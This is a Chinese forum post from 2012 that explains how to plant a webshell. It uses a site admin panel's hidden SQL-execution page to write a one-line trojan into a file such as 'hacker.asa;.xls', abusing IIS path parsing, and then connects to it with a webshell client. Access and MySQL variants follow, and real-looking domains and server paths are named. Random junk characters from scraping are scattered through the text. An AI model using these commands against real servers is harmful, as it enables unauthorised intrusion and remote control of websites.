好不容易进了后台,发现啥上传啊。备份啊多木有。
+ S5 Z7 X1 o0 f1 gwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
' A9 z2 r6 \& t! C) d6 Z7 H. r% T文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了, P3 t. K' {0 S$ k7 g: H
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
* Q' C- t6 D) f k# S8 O1.create table cmd (a varchar(50))
/ P# g& l3 K3 ^0 S* T2.insert into cmd (a) values (‘‘)# _# o/ d$ |8 g' Q: ~ {% K
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
2 _# e9 B' V7 B# T) k* R(把表cmd的内容导出为物理路径的一个EXCEL文件)5 k8 W) b* G: ?! f
4.drop table cmd. c1 Y' X) Y+ p- L* k1 R
利用IIS的BUG成功拿到了WEBSHELL。6 G! K& H/ ]4 {1 a9 R5 M
* |* ]" s [9 q; X7 Z) B直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
0 F; _8 C7 ~" f& T. G% ]
, m* c8 ^; ~: k' W# R! z SQL语句意思解释:
* J6 d# @0 b; D$ A L 第一句5 x3 v/ L* U9 o1 z4 ~
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
! a" Y- Y* |+ M& L4 }2 S& ?6 h: P! M9 m/ z, }$ ?+ W
第二句
/ d4 P4 m* X2 B* v 在表cmd的a字段插入一句话木马
# @% Q/ V! b! N8 B5 } 第三句7 f5 s% k' p" L/ O7 y( Y& w0 `
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
& ?# w" }! D" x: z! S9 c
) P, g' i, A+ A' S 第四句& p% A: N. x8 b. ]
删除建立的cmd表+ R( O. Q* D6 y6 b
+ ^! h# f. i% p7 y* p 以下内容为测试:
% {! B2 A8 E( v4 d9 U y Access利用后台SQL执行命令功能导出WebShell:6 u. m D3 F8 ^7 k2 _- v1 y% N
这个更简单:9 v* q" v/ d# ?0 r) y: ]; w
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]8 y$ N* k- C5 W* m
或者4 c9 q% C# h7 p6 z; w3 @
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]( C v9 P0 A; k; v
1 b/ [8 w; i3 T2 ^1 v
后台有执行SQL语句功能(vote为已知表段)8 y$ e: f, d% M1 H" o
希望对大家有所帮助拿shell的又一个思路$ E$ q- M; n. S% C: w6 m
|
发表于 2012-9-13 17:53:58
收藏
支持
反对